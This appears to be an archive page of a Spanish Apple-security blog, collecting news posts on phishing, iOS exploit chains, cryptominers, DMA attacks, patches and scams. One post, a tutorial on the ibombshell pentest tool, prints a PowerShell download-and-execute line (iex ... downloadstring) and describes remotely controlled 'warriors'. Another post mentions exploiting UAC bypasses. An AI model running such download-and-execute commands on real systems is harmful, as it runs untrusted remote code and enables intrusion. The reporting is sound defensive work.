Menú principal

Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas
Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas

viernes, 1 de noviembre de 2019

El Phishing golpea duramente a Apple en este primer semestre de 2019

La conocida firma de seguridad Kaspersky Labs ha afirmado que durante el último año el número de ataques phishing dirigidos a dispositivos de Apple incluyendo iPhones y MacBooks ha crecido masivamente llegando a alcanzar la cifra de 1,6 millones de dispositivos afectados en el primer semestre de 2019. Según la firma de seguridad este crecimiento en el número de ataques se ha dado gracias a innovadores métodos de ingeniería social utilizados por los atacantes. Según los expertos los servicios de soporte de Apple y el gran volumen de dispositivos de la marca que hay en el mercado es lo que atrae a los cibercriminales y está afectando al crecimiento de este tipo de prácticas.

Según el estudio realizado por Kaspersky Labs el número de ataques de phishing sufridos en lo que va de año es aproximadamente un 9% mayor al de los ataques experimentados en todo el año pasado, esto se debe a las innovadoras técnicas de ingeniería social utilizadas por los criminales. A diferencia del phishing, el volumen de software malicioso que amenaza a los usuarios de macOS y iOS es mucho menor que el que afecta a los usuarios de Windows y Android. Por otro lado, el número de casos de páginas web falsas que utilizan la marca Apple para atraer a los usuarios a sitios fraudulentos ha aumentado significativamente en el primer periodo de 2019, alcanzando la exorbitante cifra de 1,6 millones. En el estudio también se ha llegado a la conclusión de que Brasil, La India y Francia son los países que encabezan la lista de países con mayor número de infecciones (reuniendo más del 50% de los casos).

“Aunque técnicamente este tipo de estafas no sea algo nuevo, creemos que suponen un riesgo mayor para los usuarios de Apple que el uso de técnicas similares para otras plataformas como Windows o Android. Esto se debe que el ecosistema alrededor de los Macs y otros dispositivos Apple es considerado más seguro por los usuarios y al pensar eso son menos cuidadosos cuando acceden a páginas fraudulentas” ha dicho Tatyana Sidorina, una de los investigadores de Kaspersky Labs.

Figura 1: Correo phishing alertando de que tu cuenta debe ser verificada.

Como han explicado los investigadores, los esquemas de fraude más utilizados son los diseñados para suplantar la interfaz de servicio iCloud. De esta manera, los ciberdelincuentes podrían robar los credenciales de Apple ID de los usuarios comprometidos. Los enlaces a estos servicios falsos suelen provenir de e-mails no deseados que se hacen pasar por correos electrónicos de soporte técnico. En ellos es común alertar al usuario de que si no accede al enlace proporcionado su cuenta podría ser bloqueada. Otro método de los más utilizados es el uso de páginas o correos que alertan al usuario de que su equipo puede estar viéndose comprometido por una amenaza evidentemente inexistente y que puede solucionarlo actualizando sus credenciales y datos bancarios. Según Kaspersky cerca del 40% de los casos de phishing del último año buscaban monetizar el ataque a parte de obtener los datos de las víctimas.

miércoles, 4 de septiembre de 2019

Análisis y reflexiones sobre la información del ataque publicado por Google Project Zero que afectó a iOS (y a Windows y Android parece que también) durante años

Este año no está siendo bueno para Apple desde el punto de vista de la seguridad. Cada día aparecen nuevas noticias sobre vulnerabilidades o incluso otros problemas relacionados con la privacidad de los usuarios y el uso de Siri. Pero este último incidente publicado por Google Project Zero hace unos días es realmente preocupante. Incluso algunas fuentes piensan que la forma en que se han publicado (y la fecha, a sólo unos días de una keynote de Apple) es interesada. Y es que está claro que Google y Apple son competidores en un mismo mercado, pero la seguridad de los usuarios debe de estar por encima de cualquier rivalidad.

Vamos a dar un repaso a su funcionamiento y a la controversia que está rodeando al mismo. Este ataque ya fue descubierto por el TAG (Threat Analysis Group) de Google a principios de año (en concreto el día 1 de febrero de 2019). Apple fue informada para que lo solucionara en un plazo de 7 días. Así fue como el día 7 de febrero, se publicó el parche iOS 12.1.4 que solucionaba todo esos problemas detectados por el TAG de Google. No ha sido hasta el día 29 de agosto cuando realmente se ha publicado un análisis completo del incidente y hemos podido comprobar a fondo cómo funciona este ataque.

Figura 1. Acceso del "implante" (malware) a la base de datos de WhatsApp. Fuente.

Resumiendo el funcionamiento, simplemente visitando una página web, nuestro dispositivo quedaría infectado por un malware el cual obtendría todo tipo de información personal del usuario como por ejemplo, chats de WhatsApp o Telegram, contraseñas, ubicación, agenda de contactos, etc. No sabemos qué páginas web son las que han sido infectadas ni su repercusión, no es lo mismo que resulten atacadas webs como Amazon, AliExpress, YouTube, etc que otras de menor impacto en el público en general. De todas formas, parece ser que durante dos años, millones de usuarios han sido víctimas de este ataque.

El ataque se basa en encadenar (de ahí el término "chain" que aparece en la documentación) exploits (hasta 14) que afectaban por ejemplo a Safari, el kernel, etc. Algunas de estas vulnerabilidades correspondían a Zero Days incrementando la severidad del ataque. En concreto, había cinco cadenas de ataque ataques las cuales permitían conseguir una escalada de privilegios utilizando las vulnerabilidades que hemos mencionado antes. Una vez conseguido el acceso al dispositivo se instalaba un malware el cual era capaz de extraer información de la ubicación GPS, datos de iMessages o WhatsApp, fotos, etc tal y como hemos comentado anteriormente. Y todo esto simplemente visitando una página web.

Figura 2. Cadenas o "chains" de ataques encadenando diferentes vulnerabilidades. Fuente.

Pero este problema parece que no se limita a dispositivos iOS de Apple. También afecta a Windows e incluso a Android, según ha publicado Forbes. Microsoft sólo ha comentado que Google ha dejado claro que el ataque sólo afecta a iOS y Google tampoco ha desmentido ni confirmado la noticia del impacto sobre otros sistemas operativos (es posible que ellos tampoco lo supieran). Además, el objetivo principal de los ataques parece ser, según esta información, que pertenecen a dispositivos propiedad principalmente de ciudadanos chinos, en concreto de la región de Xinjang, una zona muy vigilada por las autoridades chinas debido a diferentes motivos políticos y religiosos. 

Figura 3. Seguimiento de ubicación en tiempo real del dispositivo infectado. Fuente.

Como hemos podido comprobar, existe aún mucha desinformación sobre este problema que puede tener aún más magnitud de la que inicialmente se pensaba. El equipo de Google Project Zero hace un grandísimo trabajo encontrando e informando sobre estas vulnerabilidades, pero algunos piensan que es posible que también haya detrás un interés de "sesgar" la información para obtener beneficio del rival. A nosotros, los usuarios en general, por encima de cualquier marca o sistema operativo, no nos importan este tipo de rivalidades, sólo queremos la información más completa posible para poder tener todos nuestros dispositivos actualizados y seguros de la mejor manera. Seguiremos a fondo esta noticia que dará mucho más que hablar.

jueves, 27 de junio de 2019

LoudMiner: el minero que se esconde en imágenes de disco

LoudMiner es un caso usual de minero de criptodivisas, distribuido en macOS y Windows desde agosto del año pasado este miner utiliza softwares de virtualización normalmente en QEMU para macOS o VirtualBox para Windows, minando criptomonedas en una pequeña máquina virtual en base Linux. Está asociado a las copias pirata de software VST  (Virtual Studio Technology) . El miner en sí mismo está basado en XMRig y utiliza un conjunto de herramientas de minería gracias a las que es imposible revertir las diversas transacciones que realiza.

Actualmente existen 137 aplicaciones VST (42 para Windows y 95 para macOS) disponibles en un único dominio de Wordpress registrado en 24 de agosto del año pasado. Por desgracia, el tamaño de las aplicaciones hace que no sea práctico analizarlas todas pero se puede afirmar casi con total seguridad que se encuentran trollanizadas. Las aplicaciones en si no están hospedadas en el sitio de Wordpress, sino que se encuentran en al menos 29 servidores externos a los que se puede acceder desde el apartado IoCs. Los administradores del sitio actualizan las aplicaciones con nuevas versiones haciendo más difícil su seguimiento, de hecho no se ha logrado llegar hasta la primera versión del miner.

Figura 1: Usuario alerta en los comentarios de un proceso que utiliza toda su CPU

Echando un vistazo a la naturaleza de las aplicaciones objetivo, es curioso observar que sus propósitos están relacionados con la producción de audio. Las maquinas en las que se instalan deben de contar con un gran poder de procesamiento y un gran consumo de CPU. Las aplicaciones también suelen ser complejas y de gran tamaño para que los atacantes puedan ocultar en ellas las imágenes de disco de las máquinas virtuales.

La dinámica de este miner a la hora de infectar un equipo es la misma para Windows que para Mac, se utiliza una aplicación firmada con un software de virtualización junto a algunos archivos que garanticen su persistencia, una vez descargada la aplicación se facilitan instrucciones para su instalación. Durante este proceso se instala en primer lugar LoudMiner y después el otro software. Con LoudMiner instalado (y persistente tras el reinicio), al lanzar la máquina virtual comenzará el proceso de minado. Además en la máquina virtual se utilizan scripts haciendo posible que el miner se pueda actualizar.

martes, 7 de mayo de 2019

Recupera la contraseña de tu Wi-Fi, desbloquea tu pantalla y muchas más con 4UKey

Si alguna vez has tenido que pedir o buscar la contraseña de la red Wi-Fi de un sitio en el que has estado previamente sabrás lo tediosa e incómoda que puede llegar a resultar esta situación. Por suerte para muchos, algunos de los dispositivos que usamos a diario como el iPhone, iPad o Mac disponen de una herramienta que permite compartir la contraseña de la red a la que estás conectado (aunque en ningún momento se muestre al usuario la contraseña), algo que puede ahorrarte tiempo y la molestia de tener que darle la vuelta al router para mirarla. Por eso mismo y por la dificultad que supone recordar varias contraseñas es recomendable utilizar un gestor de las mismas. 

El día de hoy os hablaremos de 4UKey, una herramienta con la que podréis recuperar las contraseñas de redes Wi-Fi almacenadas en tu iPhone, iPad, Mac o Windows. 4UKey es una herramienta de uso muy sencillo, solo tendrás que abrir la herramienta en tu ordenador y conectar tu iPhone a través de un cable. La herramienta también es capaz de recuperar las contraseñas de algunos sitios web que visitamos (como portales de correo electrónico), comprobar tu contraseña de Apple ID y cualquier otra contraseña guardada en tu dispositivo iOS. Pero sin duda el punto fuerte de esta aplicación es la posibilidad de eliminar el código de bloqueo y recuperar dispositivos bloqueados o desactivados temporalmente.

Figura 1: 4UKey para windows

Por si lo que os hemos contado no fuera suficiente, también podréis recuperar información de las tarjetas de crédito que tengáis guardadas. Una vez que hayas extraído las contraseñas que necesites podrás añadirlas a tu gestor favorito para tenerlas siempre a mano. 4UKey soporta un amplio rango de extensiones con las que exportar tus credenciales directamente a tu gestor (1Password, Keeper, LastPassword…), o si lo prefieres también puedes almacenarlas en un archivo .cvs. 4UKey está disponible tanto para Mac como para Windows y soporta todas las versiones de iOS. Puedes probar esta interesante herramienta de forma gratuita durante un mes, o también puedes adquirir la licencia de un año por 29.95 dólares o su versión vitalicia por 39.95.

viernes, 3 de mayo de 2019

Apple actualiza XProtect para combatir los exploits de Windows en máquinas Mac

Apple ha mejorado su software de seguridad XProtect con la idea de que sea capaz de detectar archivos Windows que puedan suponer un peligro para los usuarios de Mac. Según el investigador en ciberseguridad Patrick Wardle, la actualización ahora es capaz de detectar ejecutables del tipo Windows Portable Executable (PE) y archivos y segmentos binarios. Xprotect es un sistema basado en firmas vinculado a los dispositivos iOS y su Gatekeeper. Para proteger y alertar a los usuarios cuando se detecta un archivo malicioso Gatekeeper lo pone en un proceso de “cuarentena” en el que se analiza la firma del mismo y si está en los registros de Xprotect.

XProtect está basado en una herramienta open source desarrollada por Google llamada Yara, esta otra herramienta fue diseñada para la comprobación de malwares basados en reglas establecidas por cadenas y expresiones booleanas. Según Wardle en esta actualización de seguridad se ha añadido la definición de un malware en forma de archivo .EXE (TrojanSpy.MacOS.Winplyer) diseñado para atacar a equipos Mac . A pesar de que los archivos .EXE se asocien comúnmente a Windows el pasado mes de febrero los investigadores de Trend Micro descubrieron una interesante campaña que trataba de armar archivos de este tipo firmándolos con una app llamada Little Snitch.

Figura 1: Archivos .EXE se pueden ejecutar en Mac

Esta campaña de malware tiene como objetivo aprovecharse de esta plataforma de compatibilidad entre Windows y Mac para la sustracción de información y la infección de varios equipos con adwares. Aunque TrojanSpy.MacOS.Winplyer haya sido diseñado para evadir el Gatekeeper de Apple todavía no hay ninguna evidencia de que lo haya logrado, además con XProtect actualizado también se ha cerrado otra posible ruta por la que el malware podría llegar a los equipos. Independientemente de cual sea tu sistema operativo desde Seguridad Apple aprovechamos para recordaros la importancia de revisar los ejecutables que nos descarguemos para asegurarnos de que estos no comprometerán nuestros equipos.

martes, 23 de abril de 2019

Warning: Nuevo caso de malvertising en Chrome para iOS

Desde hace unos años el uso de navegadores en dispositivos móviles y tablets se ha disparado brutalmente, ya sea por comodidad o porque son dispositivos que llevamos encima todo el día. Google Chrome se ha convertido en uno de los navegadores más utilizados gracias a su rapidez y eficacia, sin embargo recientemente se ha sabido que cuenta con un grave problema de seguridad que afecta única y exclusivamente a los dispositivos iOS, si utilizas este navegador desde sistemas operativos Android, macOS o desde Windows no tienes por qué preocuparte.

En la mayoría de sus versiones el navegador de Google está desarrollado bajo Chromium, un motor de búsqueda desarrollado por Google, sin embargo la versión de Chrome para iOS se basa en el mismo motor que Safari, en Webkit (aunque esté desarrollado en Webkit la vulnerabilidad no afecta a Safari). Según la firma de ciberseguridad Confiant la versión de Chrome desarrollada en Webkit se ve afectada por un gran problema de malvertising, un tipo de ataque del que ya os hemos hablado en el blog y que se ha popularizado bastante en los últimos años.

Figura 1: Pop-up proveniente del malveritsing

Este tipo de ataque consiste en aprovecharse de los anuncios que circulan por internet para inyectar código malicioso en ellos y esquivar así las medidas de seguridad de los navegadores. Algunos de los síntomas más comunes de estos ataques son la redirección a algunas páginas fraudulentas o la aparición de pop-ups que resultan bastante molestos. La firma de seguridad ya ha alertado a Google, que ya está trabajando para solucionar este problema. Por el momento lo mejor que podéis hacer para aseguraros de no caer en esta oleada de ataques es cambiar temporalmente de navegador hasta que se solucionen los problemas. 

viernes, 8 de marzo de 2019

Thunderclap: Los periféricos de tu Mac comprometidos

Según los investigadores, se ha sabido recientemente que los periféricos con conexiones Thunderbolt y PCI Express han podido estar utilizándose para comprometer la seguridad de equipos corriendo macOS, Windows, Linux y FreeBSD. La semana pasada tuvo lugar el Network and Distributed System Security Symposium (NDSS), donde uno de los asistentes conocido como Thunderclap hizo la demostración de una vulnerabilidad con acceso directo a la memoria (DMA). Recurrir al acceso directo a la memoria es una técnica que se usa comúnmente para acelerar el acceso a la memoria desde el almacenamiento interno, controladores USB y tarjetas gráficas o de red.

Más recientemente, los mismos privilegios a bajo nivel se han extendido a varios periféricos como Firewire, Thunderbolt 2 y 3 o USB-C, lo que esencialmente incrementa el riesgo de sufrir un ataque dirigido desde los propios subsistemas de nuestro equipo hacia cualquier objeto conectado a él. Los ataques DMA han sido teorizados durante años, ya que el acceso se obtiene a través de un espacio de dirección virtual gestionado por el sistema operativo conjuntamente con unidades de gestión de memoria de entrada y salida del hardware. Por desgracia la protección ofrecida por las Input-Output Memory Management Units (IOMMUs) no es tan robusta como los expertos esperaban y existen numerosas rutas por las cuales un periférico malicioso podría eludir o manipular esta capa de seguridad.

Figura 1:Funcionamiento del acceso directo a la memoria

En cuanto al número de equipos afectados por esta vulnerabilidad, las cifras ascienden a millones, todos aquellos equipos que dispongan de un puerto Thundebolt o USB-C y corran Windows, Linux, FreeBSD o macOS. El puerto Thunderbolt ha sido un estándar en los Mac desde 2011, de hecho el único modelo de Apple que se salva es el MacBook de 12 pulgadas, que no incorpora este tipo de puerto. Por el momento para protegerse de esta vulnerabilidad el único método 100% seguro es deshabilitar los puertos afectados de tu equipo, una medida que no resulta nada cómoda. Otra opción, bastante mejor, consiste en evitar el uso de unidades de carga públicas o periféricos desconocidos. Aunque algunos investigadores ya avisasen de este problema a los principales proveedores de sistemas operativos en 2016 y se hayan ido lanzando actualizaciones y parches de seguridad el riesgo de sufrir un ataque de este tipo sigue siendo bastante alto.

miércoles, 19 de diciembre de 2018

El Security Update de diciembre acaba con 13 vulnerabilidades críticas para macOS e iOS

Como es habitual, Apple ha lanzado una serie de actualizaciones de seguridad para el software de Mac e iOS. Los parches de diciembre también solucionan fallos en tvOS, Safari y en la versión de iTunes e iCloud para Windows. Todas estas actualizaciones deberían de instalarse lo antes posible. Para los Mac, las actualizaciones vendrás de la mano de Mojave 10.14.2, High Sierra Security Update 2018-003 o Sierra Security Update 2-18-006, dependiendo de la versión de macOS instalada en el equipo. Cada actualización incluye la solución de un total de 13 vulnerabilidades, incluyendo 7 que permitirían a una aplicación o usuario malicioso escalar privilegios y obtener el control de los dispositivos.

Estas brechas incluyen dos fallos en Windows Server, tres en el Kernel, uno en el Carbon Core, uno en las imágenes de disco y otro en IOHIDFamily. La actualización también soluciona problemas de exposición en la memoria de del Kernel por parte del driver de gráficos de Intel. Los usuarios de Mac quieren obtener la versión 12.0.2 de Safari con la intención de solventar nueve vulnerabilidades en el navegador y en el funcionamiento de WebKit. Todos los bugs de WebKit permitirían la ejecución de código arbitrario en remoto a través de una página web maliciosa, mientras que las brechas en Safari permitirían la realización de un interface o address bar spooffing además de provocar algunos problemas a la hora de hacer limpieza en el historial.

Figura 1: Actualización de macOS 10.14.2

Para los propietarios de iPhone e iPad, la actualización vendrá con el nombre de iOS 12.1.1, en ella se incluirán parches para las anteriormente mencionadas vulnerabilidades de Safari y Webkit, además de los fallos en las imágenes de disco y en el Kernel. Los fallos que son únicamente relativos a iOS corresponden al bug que permitía acceder a los contactos a través de Facetime y a otros 3 bugs que revelan información comprometida. Para Apple TV el lanzamiento de tvOS 12.1.1 supondrá la solución de todos los bugs derivados de los anteriormente mencionados para macOS e iOS. En cuanto a los usuarios de softwares de Apple en sistemas operativos Windows se encuentran a la espera de la llegada de las actualizaciones de iTunes 12.9.2 e iCloud 7.9 for Windows. Cómo estas dos aplicaciones se basan en componentes de WebKit y Safari, la instalación de los parches también será necesaria en las aplicaciones para Windows.

sábado, 8 de diciembre de 2018

El proyecto olvidado Star Trek: cuando Apple y Novell se unieron para portar las aplicaciones Mac a Intel ... en 1985

Es habitual pensar que el salto de Apple de PowerPC a Intel ocurrió con el Mac OS X en 2005. Pero la realidad es que ya en 1985, poco después de que Steve Jobs "dejara" la empresa, ya comenzaron algunos movimientos internos para conseguir exportar aplicaciones Mac OS a la arquitectura x86. Pero aún pesaba la sombra de Jobs que era totalmente contrario a esta operación, así que no fue hasta varios años después, en 1992, cuando su sucesor y némesis, John Scully, resucitó el proyecto.

Microsoft Windows 3.1 apareció ese mismo año, en 1992 y se convirtió rápidamente en un producto estrella en el mercado informático. Además de ser una amenaza para Apple, ofreciendo un sistema operativo basado en una interfaz gráfica (igual que el Mac OS, lo que enfadó y mucho a Jobs tal y como ya contamos en su día aquí), también lo era para la empresa Novell. Windows y sobre todo el futuro Windows NT eran una auténtica amenaza para el producto NetWare, el cual tenía el monopolio de las redes de ordenadores.

Figura 1. Consola de administrador para Novell Netware 3 (1998). Fuente

El presidente de Novell, Darrell Miller, hizo una propuesta al CEO de Apple de la época, John Scully, para portar las aplicaciones Mac OS a la arquitectura x86 de Intel. Al principio, Scully no estaba mucho por la labor, él pensaba que el futuro del negocio de Apple no pasaba por el hardware (fabricar ordenadores) y quería centrarse sólo en software. Pero finalmente también llegó a la conclusión que sería una buena forma de llevar ese software fuera de la arquitectura Apple y expandir fronteras. Además también tenían el apoyo del CEO de Intel, Andy Grove, el cual también veía una amenaza en Microsoft y sus productos.

Figura 2. Steve Jobs, John Scully y Steve Wozniak presentando el Apple IIc en 1984 en San Francisco. Fuente.

Así que un día de San Valentín de 1992 nació el proyecto llamado Star Trek con su eslogan "Star Trek: para ir audazmente hacia donde ningún Mac OS ha llegado antes", formado por ingenieros de Apple y Novell. El objetivo era portar aplicaciones (y el Mac OS) al 486 de Intel con una fecha de entrega el día de Halloween de ese mismo año, en octubre. La tarea no fue fácil, prácticamente todo el Mac OS estaba programado directamente en ensamblador 680x0 entre otras cosas para que fuera lo más rápido posible y ocupar el mínimo de espacio. Por lo tanto, todo ese código no se podía exportar directamente a 486 así que habría que reescribirlo desde cero (otras partes fueron mas sencillas de exportar al estar programadas mayoritariamente en Pascal). En el siguiente video, uno de los integrantes del equipo Star Trek, Tom Rolander (de Novell) , nos explica detalles de la demo que estaban creando:


Finalmente cumplieron los plazos de entrega y el 1 de diciembre de 1992 tuvieron la primera demo totalmente funcional del producto. Para los directivos de Apple era realmente alucinante ver como programas como el clásico Finder o incluso programas comerciales como QuickDraw o QuickTime se podían ejecutar perfectamente en un PC con un microprocesador Intel. Lamentablemente, John Scully terminó su carrera en Apple justo en mitad del proyecto y el nuevo CEO, Michael Spindler, no tenía muchas ganas de continuar con él (estaban centrados más en el System 7 para los PowerPC). Así el proyecto fue cancelado y ya no se vería algo como ejecutar aplicaciones Mac en un Intel hasta que Apple compró NeXT en 1996, justo en la llegada de nuevo de Steve Jobs a Apple. Finalmente en junio de 2005, Jobs anunció el cambio de plataforma PowerPC a Intel.

lunes, 6 de agosto de 2018

Alerta Scam: En este caso se suplanta el call center de Apple Care (y cuidado con las web pornográficas)

Las estafas de falsos mensajes de soporte no son nada nuevo, desde hace años han estado presentes en nuestros ordenadores y teléfonos móviles. Este tipo de estafas suelen llevarse a cabo a través de dos métodos, en el primero de ellos consiste en realizan llamadas a la víctima tratando de convencerla de que su equipo está en riesgo y ofreciéndole una solución para un problema que realmente no existe (generalmente solicitando acceso remoto al dispositivo). El segundo método se basa en el uso de un email que te alerta de que tu equipo ha sido comprometido ofreciendo un enlace o número de teléfono con el que contactar para solucionar el problema.

Otro de los métodos más habituales para realizar estafas de este tipo es a través de pop-ups o anuncios emergentes que aparecen al navegar por páginas web no seguras. Si has tenido la mala suerte de encontrarte con este tipo de estafas en los últimos años, sabrás que en la mayoría de ocasiones estos pop-ups suelen suplantar las alertas de Windows, sin embargo cada día son más comunes los scams que suplantan a Apple. Recientemente han sido descubiertos varios casos en los que se ha suplantado el call center de Apple Care. En estos casos se alerta a los usuarios de que su dispositivo con iOS o macOS ha sido bloqueado debido a actividades ilegales en páginas pornográficas. El Scam en muchas ocasiones resulta bastante creíble debido a que utilizando técnicas de fingerprinting es capaz de mostrar el modelo del dispositivo y el dominio de alguna página pornográfica que el usuario hubiese visitado previamente. Para terminar, se pone a disposición de la víctima un número de teléfono con el que deberá contactar para llevar a cabo la reparación de su equipo.

Figura 1: Scam utilizando Apple Care

Para evitar caer en este tipo de estafas es importante no pinchar sobre los links que recibas en correos que te avisen de problemas en tu cuenta, para comprobarlo la mejor opción siempre es dirigirse a la página oficial del servicio afectado y realizar las gestiones necesarias desde ella.

Figura 2: Mensaje de scam sobre actividad en sitios porno

También es importante no llamar a los números de teléfono que aparezcan tanto en anuncios emergentes o correos que resulten sospechosos. En caso de recibir una llamada de soporte has de recordar que Apple nunca iniciará una conversación de soporte con sus clientes (sobre todo a través de una llamada telefónica) a no ser que estos hayan iniciado el contacto previamente por algún problema o para realizar una consulta.

martes, 31 de julio de 2018

ibombshell: Creando una función para macOS

El otro día hablamos en el blog de ibombshell, una herramienta escrita en Powershell que proporciona al pentester un prompt dinámico sin necesidad de instalar en memoria las herramientas que vaya a utilizar. En ese post ya mencionamos que gracias a la llegada de Powershell a macOS y Linux, la herramienta puede ser ejecutada en todas estas plataformas además de su entorno predilecto, Windows. Hoy vamos a indagar un poco más en como añadir nuevas funcionalidades que pudiéramos necesitar en ibombshell, en este caso enfocado a macOS. Powershell Core apareció en este sistema operativo en su versión 6.0 junto con ciertas funcionalidades destinadas a poder adaptar scripts a estas nuevas plataformas.

Las variables $IsWindows, $IsLinux, $IsOSX y $IsCore fueron incluidas para poder aplicar diferentes funcionalidades en scripts dependiendo del sistema operativo, junto con nuevos cmdlets adaptados a los sistemas operativos recién integrados. Uno de ellos es ‘system_profiler’, que al ejecutarlo en macOS obtenemos toda la información relativa al sistema. Este comando es muy extenso y pesado, por ello acepta argumentos para filtrar información relativa a una parte del sistema. Conociendo esto, vamos a incluir una nueva funcionalidad en ibombshell para sacar la información más general de un mac, la información del hardware y la de red.

Creando una función de ibombshell everywhere

Añadir una nueva funcionalidad en ibobmshell es un proceso relativamente sencillo, pero involucra una serie de pasos en los que es necesario tener una cuenta de GitHub y modificar determinadas URL en el proyecto. Los pasos son los siguientes: 
  1.  Crear un fork del repositorio oficial de ibombshell
  2. Cambiar la URL donde apunta la consola, y el módulo de python a nuestro nuevo fork. (Adicionalmente la función de bypassuac también apunta al repositorio principal, tendría que cambiar la url si es necesario su uso). 
  3. Crear una nueva función. En este caso creamos una carpeta nueva llamada macOS (data/functions/macos) con el fin de separar lógicamente funcionalidades orientadas a este sistema operativo con el resto y dentro de ella añadimos un nuevo fichero sin extensión (data/functions/macos/sys-info
  4. Añadir la función al fichero ‘functions.txt’ indicando el path. (macos/sys-info
  5. Realizar un commit con los cambios y subirlo a nuestro fork.
Figura 1: Función de Powershell para macOS

Una vez completado, solo queda probar la herramienta desde nuestro equipo con macOS. Hay que recordar que nuestra consola se encuentra en una url distinta a la oficial, por lo que debemos apuntar a nuestro repositorio.

> pwsh 
> iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/lucferbux/ibombshell/master/console’)

Figura 2: Función ejecutada

Creando el módulo para el modo Silently

ibombshell tiene una funcionalidad muy interesante para ejecutar remotamente código desde un módulo escrito en python. El funcionamiento de este modo está descrito en el repositorio oficial, donde se explica como funciona la conexión entre el host principal y todas las máquinas controladas remotamente, llamadas warriors.

Para añadir una nueva funcionalidad solo es necesario crear un nuevo archivo python, añadir las opciones de ejecución para indicar el warrior a seleccionar, indicar el tipo de información a obtener y la función que queramos ejecutar.

Figura 3: Módulo en el modo Silently ejecutado

Una vez creado lo ejecutamos para comprobar que funcione correctamente, para ello creamos un nuevo warrior en una consola de powershell mientras ejecutamos el nuevo módulo creado en la herramienta de ibombshell en python.

miércoles, 18 de julio de 2018

Apple parchea 76 vulnerabilidades con su última actualización de software

El pasado día 9 de julio Apple lanzó parches para varios de sus servicios, entre los que se encuentran iTunes, Safari e iOS. La mayor parte de las vulnerabilidades corregidas pertenecían al sistema operativo, que acumulaba 22 CVEs pendientes de parchear. Estas vulnerabilidades afectaban a los dispositivos posteriores al iPhone 5S, iPad Air e iPod Touch de sexta generación, dispositivos en los cuales los problemas de corrupción en su memoria podían causar la posibilidad de ejecutar código arbitrario en ellos.

Continuando con las reparaciones, Apple ha arreglado 14 fallos en iTunes 12.8 para Windows. En caso de no haber solucionado estos fallos podría haberse traducido en la ejecución de código arbitrario, denegación del servicio, y varios fallos relacionados con las Cookies en el navegador Safari. En su navegador Apple ha cubierto 16 CVEs, de los cuales 7 permitían la ejecución de código remoto. En iCloud para Windows también se ha realizado el parcheo de 13 vulnerabilidades que también corrompían la memoria de los dispositivos.

Figura 1: CVE de iOS 11.4.1 arreglado en la actualización

En cuanto al sistema operativo de escritorio, macOS High Sierra 10.13.6 acumulaba un total de 11 vulnerabilidades, las cuales podrían permitir varios fallos de corrupción de memoria dando lugar a posibilidad de ejecutar código arbitrario, realizar un ataque de escalada de privilegios e incluso a la obtención de acceso root. De esta actualización de seguridad tampoco se salvan el Apple Watch ni el Apple TV, en el caso de WatchOS 4.3.2 se han cubierto 14 vulnerabilidades relacionadas con la gestión de las cookies, la denegación de servicio y la prohibición de acceso. Para terminar hablamos de tvOS 11.4.1, sistema en el cual se han arreglado ni más ni menos que 18 vulnerabilidades, en este caso era posible la lectura de partes restringidas de la memoria utilizando aplicaciones maliciosas y la ejecución de contenido web malicioso capaz de crashear Safari.

martes, 19 de junio de 2018

Code Talks for Devs: 'UAC-A-Mola', un framework que permite investigar, detectar y mitigar bypasses de UAC


El próximo 20 de junio se impartirá el cuarto CodeTalk de la segunda temporada. En esta ocasión, el webinar lo impartirá nuestro compañero Pablo González (@pablogonzalezpe), responsable del equipo de Ideas Locas en el área CDO de Teléfonica. El talk estará presentado y moderado por nuestro compañero Fran Ramírez, investigador de seguridad en el departamento de Ideas Locas en el área CDO.

Este Code Talks for Devs constará de una primera parte dónde introduciremos la herramienta UAC-A-Mola. A su vez, hablaremos sobre la arquitectura del framework, veremos cómo de sencillo es construir un módulo que se adapte a nuestras necesidades sin apenas saber programar y haremos un pequeño recorrido por el código de la aplicación, resaltando las partes más importantes. Por otro lado, en la segunda parte del talk, mostraremos de forma práctica los usos de la herramienta, desde la explotación de este tipo de fallos en los últimos sistemas operativos Windows, hasta el proceso de investigación que se puede seguir para detectarlos o mitigarlos en tu propio ordenador personal. Puedes descargar la herramienta desde el Github de ElevenPaths. Además, puedes ver el paper del trabajo desarrollado.

Figura 1: Tercer Code Talk for Devs

Tienes una cita con nosotros en la comunidad de ElevenPaths. Podrás visualizar el webinar y a su vez dejar todos los comentarios o dudas que te vayan surgiendo para que los expertos de ElevenPaths e incluso otros usuarios de la comunidad te respondan. Si no puedes acceder a esta hora, ¡no te preocupes! todos los webinar están disponibles en la web de ElevenPaths pasados un par de días del estreno.

viernes, 20 de abril de 2018

Ejecutar Windows 7 en un iPhone X ya es posible y tiene este aspecto

Desde que Apple lanzó el iPhone X el año pasado el dispositivo ha sido el objetivo de muchos experimentos debido a su gran potencia. Recientemente un  hacker y youtuber llamado Jules ha subido a su canal un video en el que logra arrancar la versión completa de Windows 7 en un iPhone X. Para hacer esto posible Jules utilizó el emulador bochs x86. Esta no es la primera vez que HackingJules ha traído un sistema operativo de escritorio a dispositivos iOS, en otras ocasiones ha sido capaz de ejecutar Windows 95 y el juego SimCity 2000 en el iPhone X o Windows XP y Windows Vista en un iPhone 7.

Como podréis observar en el video que os traemos a continuación, arrancar Windows 7 en el iPhone X no es una tarea sencilla y puede resultar un poco pesada por su lentitud. Iniciar el sistema operativo toma alrededor de unos 30 minutos antes de poder ser completamente funcional. Una vez acabado el proceso de carga podréis observar como Jules interactúa con el menú principal y programas como  Paint o el panel de control.


Para poder mover el cursor por la pantalla es necesario arrastrar el dedo sobre ella y para seleccionar una aplicación o programa hay que pulsar simulando el Touchpad de un ordenador. Sin duda esto es una curiosa forma de comprobar las capacidades y la potencia del buque insignia de Apple. En cuanto a utilidad, no es necesario decir que no tiene ninguna más allá de la diversión.

martes, 27 de febrero de 2018

Apple dejará de ofrecer soporte para la tienda de iTunes en Windows XP, Vista y Apple TV de primera generación

Apple ha publicado un nuevo documento de soporte en el que explica que a partir del 25 de mayo dejará de ofrecer soporte para iTunes Store en equipos que estén corriendo Windows XP y Windows Vista, algo que también hará en los Apple TV de primera generación. Según la compañía esto es parte de una actualización de seguridad. El documento de soporte explica que Apple introducirá algunos cambios de seguridad a partir de finales del próximo mayo para prevenir el acceso de dispositivos anticuados a la tienda de iTunes. Ambos sistemas operativos de Windows dejarán de ser mantenidos por Microsoft, además la última versión de iTunes no está disponible para estos sistemas operativos.

Según Apple los usuarios de los sistemas operativos afectados podrán seguir utilizando iTunes en su ordenador, solo que sin el soporte de Apple y sin soporte en la tienda de iTunes.

